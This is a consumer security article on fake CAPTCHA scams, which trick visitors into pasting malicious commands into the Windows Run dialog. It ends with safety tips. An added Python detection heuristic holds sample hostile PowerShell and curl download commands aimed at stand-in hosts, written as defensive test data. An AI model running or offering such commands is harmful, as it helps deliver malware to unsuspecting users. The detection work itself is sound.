We’ve all done it: clicked a CAPTCHA box that says “I’m not a robot” without giving it a second thought. These quick human verification checks are so familiar that they’ve become almost invisible, and that is exactly what cybercriminals are counting on.
A new wave of scams exploits this trust through Fake CAPTCHAs: deceptively realistic-looking prompts designed not to verify that you are human, but to trick you into running malicious commands on your own device.
What is a CAPTCHA?
A CAPTCHA (which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart”) is a security feature used by websites to determine whether a user is a real person or an automated bot. CAPTCHAs help protect websites from spam, abuse, and malicious activity by presenting challenges that are easy for humans to solve but difficult for automated systems, such as identifying objects in images, typing distorted text, or solving simple maths problems. They are commonly used during account sign-ups, form submissions, or logins to ensure that the interaction is genuine.
What Is a Fake CAPTCHA?
A Fake CAPTCHA is a phoney version of the familiar CAPTCHA test. However, unlike a legitimate CAPTCHA that might ask you to identify traffic lights or solve a puzzle, this fake version might ask you to:
- Press certain keys (like Windows + R)
- Paste copied text into a terminal or command prompt
- Download a file or script
- Enter your system credentials
These unusual requests are red flags – no real CAPTCHA should ever ask you to interact with your system this way.
How the Scam Works
- The Setup: You visit a compromised or malicious site. A seemingly safe CAPTCHA window appears.
- The Deception: You’re asked to click a checkbox or follow instructions, like copying and pasting text or pressing keys.
- The Trigger: These actions execute a script or command on your machine.
- The Damage: Malware is downloaded, possibly giving cybercriminals access to your sensitive data, including passwords, banking info, and more.
This scam is especially dangerous because it feels like you're in control. You’re not being hacked in the traditional sense; you’re being tricked into hacking yourself.
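As an added illustration, not part of the original article, of how a defender can catch the Trigger step: whatever is pasted into the Windows + R Run dialog is started by explorer.exe, so an endpoint log that records parent process, process and command line can flag a cmd.exe or powershell.exe spawned directly by explorer.exe whose command line carries a URL (the payload has to be fetched from somewhere). The log lines, the flattened field layout and the .invalid hostnames below are all constructed.

```python
import re
from typing import Dict, List

# Constructed process-creation events (Sysmon Event ID 1 style, flattened to
# "ParentImage|Image|CommandLine"). Sample data, not real telemetry.
SAMPLE_EVENTS = [
    "explorer.exe|notepad.exe|notepad.exe C:\\Users\\alice\\notes.txt",
    'explorer.exe|powershell.exe|powershell -w hidden -c "Invoke-WebRequest http://captcha-check.invalid/verify"',
    "explorer.exe|cmd.exe|cmd /c curl https://robot-verify.invalid/step2",
    "cmd.exe|powershell.exe|powershell -File C:\\scripts\\backup.ps1",
    "explorer.exe|cmd.exe|cmd /c ipconfig /all",
]

# Interpreters that a command pasted into the Run dialog typically resolves to.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# A fake CAPTCHA must fetch its payload, so a URL in the command line is the key signal.
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

def parse_event(line: str) -> Dict[str, str]:
    """Split one flattened event into its three fields."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}

def is_suspicious(event: Dict[str, str]) -> bool:
    """Flag an interpreter spawned directly by explorer.exe (Run dialog, i.e.
    the user typed or pasted it) whose command line references a URL.
    Shells a user opens interactively rarely do both at once."""
    return (
        event["parent"] == "explorer.exe"
        and event["image"] in INTERPRETERS
        and URL_RE.search(event["cmdline"]) is not None
    )

def find_fake_captcha_hits(lines: List[str]) -> List[Dict[str, str]]:
    """Return the matching events, each with the extracted URL for triage."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_suspicious(event):
            event["url"] = URL_RE.search(event["cmdline"]).group(0)
            hits.append(event)
    return hits

if __name__ == "__main__":
    for hit in find_fake_captcha_hits(SAMPLE_EVENTS):
        print(f"[ALERT] {hit['image']} launched by {hit['parent']} reaching out to {hit['url']}")
```

This is a heuristic: an administrator who pastes a download command into the Run dialog will trip it too, so treat hits as leads to confirm against the user's browsing history rather than as verdicts.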
Why It Works
The strength of the Fake CAPTCHA scam lies in its subtlety. It uses something we’ve grown used to, a CAPTCHA, and twists it into a delivery mechanism for malware. Because we’re so used to CAPTCHAs being a routine part of web browsing, we often don’t pause to question their authenticity.
What You Can Do to Stay Safe
Here are some quick tips to protect yourself:
Be sceptical of unusual CAPTCHAs
If a CAPTCHA asks you to do anything beyond clicking a box, selecting images, or solving a simple puzzle inside the web page itself, something’s wrong.
Never run commands or paste text from unknown sites
Legitimate websites and CAPTCHAs will never require you to interact with your system in this way.
Keep antivirus software up to date
Modern security tools can detect and block malicious scripts before they can cause harm.
Stay informed
Knowing how these scams work is half the battle. The more familiar you are with the red flags, the less likely you are to fall for them.
Ask for help
If you’re ever unsure whether an instruction is safe, speak to your family and friends, or contact us here (cyber concerns).
The Bottom Line
Fake CAPTCHAs are a sobering reminder that even the most mundane online tasks can be weaponised. These scams are clever, convincing, and increasingly common. So next time a site asks you to prove you’re not a robot, pause for a moment. If anything seems off, don’t click and don’t follow instructions without verifying.